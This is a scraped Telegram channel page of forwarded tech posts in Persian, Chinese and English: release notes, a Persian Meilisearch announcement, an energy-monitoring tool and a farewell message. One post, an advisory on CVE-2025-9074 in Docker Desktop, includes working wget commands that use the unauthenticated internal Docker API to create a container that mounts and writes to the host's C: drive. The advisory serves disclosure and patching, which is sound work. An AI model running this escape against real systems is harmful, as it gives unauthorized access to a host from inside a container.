Sonia Software Notes
2.02K subscribers
307 photos
16 videos
46 files
531 links
Download Telegram
Forwarded from localhost (Yousef Taheri)
Toyota CHR
Mikrotik CHR
Forwarded from Decrypt
AI Now Matches Prediction Markets in Forecasting Real Events, Study Finds

University of Chicago’s Prophet Arena pits AI models against live prediction markets. Early results suggest machines can match, and sometimes beat, the wisdom of crowds.
3
🤣37
Forwarded from Xero Notes
🐋 آسیب‌پذیری CVE-2025-9074 در Docker Desktop

اخیرا از آسیب‌پذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را می‌دهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیب‌پذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی می‌توان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.

💥 این آسیب‌پذیری چطور به وجود آمده است؟

در Docker Desktop نسخه‌های قبل از ۴.۴۴.۳، هر کانتینری می‌توانست به API Docker با آدرس http://192.168.65.7:2375 دسترسی داشته باشد بدون اینکه نیاز به احراز هویت برای استفاده از آن داشته باشد.. با استفاده از این دسترسی، مهاجم می‌تواند یک کانتینر جدید با دسترسی‌های ویژه راه‌اندازی کرده و در نهایت به فولدر C: در سیستم میزبان دسترسی پیدا کند. لازم به ذکر است که این آسیب پذیری در نسخه مک نیز قابل استفاده است و امکان دسترسی روت را برای مهاجم فراهم می‌کند.

💠 نمونه کد برای آزمایش آسیب‌پذیری

ابتدا یک کانتینر Alpine بسازید.
docker run -it alpine /bin/sh


سپس با استفاده از پیلود زیر، آسیب‌پذیری را تست کنید.
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /mnt/host_root/pwn.txt"],"HostConfig":{"Binds":["//c/host_root:/mnt/host_root"]}}' \
-O - https://192.168.65.7:2375/containers/create > create.json

cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - https://192.168.65.7:2375/containers/$cid/start


این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
192.168.65.7:2375/containers/create


یک کانتینر جدید با دستور echo pwned > /mnt/host_root/pwn.txt می‌سازد و با استفاده از قابلیت Volume در Docker، مسیر C:/host_root را به mnt/host_root/ در داخل کانتینر مپ می‌کند.

📊 امتیاز CVSS

این آسیب‌پذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار می‌گیرد:

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H


راه‌حل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.

🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074

#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
👍9🤣21
Forwarded from Project X Channel
Xray-core v25.9.10 正式版,支持 VLESS Reverse Proxy 极简配置

VLESS NFT 自成一个系列,每个图片都不同且只有一个,你可以选择自己喜欢的图片来收藏,先到先得

https://opensea.io/collection/vless 首发放出了二十个不同的 VLESS NFT 图片

本次还放出了两个稀缺的 Project X NFT,如果你有余力,请支持一下:https://opensea.io/assets/ethereum/0x5ee362866001613093361eb8569d59c4141b76d1/1
2
Forwarded from Project X Channel
Xray-core v25.9.5 正式版,支持 VLESS Post-Quantum Encryption

或者你也可以使用 Mihomo v1.19.13 ,感谢多次 sync code

VLESS NFT 自成一个系列,每个图片都不同且只有一个,你可以选择自己喜欢的图片来收藏,先到先得

https://opensea.io/collection/vless 首发放出了二十个不同的 VLESS NFT 图片

本次还放出了两个稀缺的 Project X NFT,如果你有余力,请支持一下:https://opensea.io/assets/ethereum/0x5ee362866001613093361eb8569d59c4141b76d1/1
2👍1
🚀 ابزار مانیتورینگ Consumption

با کمک این ابزار می‌توانید مصرف انرژی یک پروسه در حال اجرا را با دقت تقریبی ۸۰ تا ۹۰ درصد محاسبه کنید.
الگوریتم به‌کاررفته، توان مصرفی را بر اساس سهم CPU، عملیات دیسک و فعالیت حافظه مدل‌سازی کرده و در پایان هر اجرا، گزارشی کامل و ساختارمند از توان لحظه‌ای (Watt) و انرژی تجمعی (Joule) پروسه ارائه می‌دهد.

🔧 ویژگی‌ها:

- مانیتورینگ در سطح پروسه یا کل درخت پروسه‌ها
- خروجی‌های متنوع: جدول، CSV، JSON و گزارش HTML
- الگوریتم اختصاصی برای تخمین توان بر اساس CPU، دیسک و رم
- قابل تنظیم با پارامترهای دلخواه (Idle, Max Power, γ و …)

🎯 هدفم از این پروژه این بود که یه ابزار ساده، سریع و اوپن‌سورس برای تیم‌ها و ادمین‌هایی باشه که می‌خوان مصرف انرژی سرویس‌هاشون رو تخمین بزنن و مقایسه کنن.


📂 سورس‌کد و مستندات و دانلود:
github.com/ja7ad/consumption
8
🤣235💋2👍1
امروز روز برنامه نویساس

ایشالا پشت سیستم خوشبخت بشید
2❤‍🔥2912💊2😁1
Forwarded from Golang Insights (Javad)
🚀 پشتیبانی کامل زبان فارسی در موتور جستجو Meilisearch

پس ماها تلاش بالاخره در یک نسخه رسمی, زبان فارسی بصورت کامل و سریع به موتور جستجو Meilisearch اضافه شد.

میلی‌سرچ (Meilisearch) یک موتور جستجوی متن‌باز، سبک و بسیار سریع است که امکان جستجوی آنی (instant search) با نتایج دقیق و مرتبط را فراهم می‌کند.

این موتور به‌سادگی در پروژه‌ها ادغام می‌شود و برای کاربردهایی مثل وب‌سایت‌ها، اپلیکیشن‌ها و سرویس‌های داده گزینه‌ای ایده‌آل است.

💎 طی این پول ریکوئست: https://github.com/meilisearch/charabia/pull/350

زبان فارسی به موتور جستجو اضافه شد حال بصورت رسمی داخل Meilisearch می توانید استفاده کنید.


⬇️ دانلود نسخه جدید موتور جستجو: https://github.com/meilisearch/meilisearch/releases/tag/v1.21.0


🔥 پکیج SDK رسمی زبان گو: https://github.com/meilisearch/meilisearch-go


⚡️@GoInsights | @GolangEngineers
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
71
فاتحه رو باید خوند 😂
🤣33
Forwarded from Sudoer - Powered OFF
درود
فک کنم دیگه زمان کنار کشیدن من رسیده
توی این چند سالی که فعال بودم، کنار زندگی خودم، همیشه سعی داشتم تا بتونم به جامعه‌ای که عضوی ازش هستم کمک کنم و تاثیرگذار باشم. مدتیه که منتظر روزی بودم که ذهن و روح و روانم رو آماده کنم تا این پیام رو بنویسم و خداحافظی کنم و امروز، اون روز است.
قبلا هم این تصمیم رو موقت گرفته بودم، ولی اینبار متفاوته.
امروز ۳۱ شهریور، روزی که برام خیلی مهم و متفاوته تصمیم گرفتم تا این کار رو بالاخره انجام بدم.

مراقب خودتون باشید
مرتضی باشسیز
💔275🤣3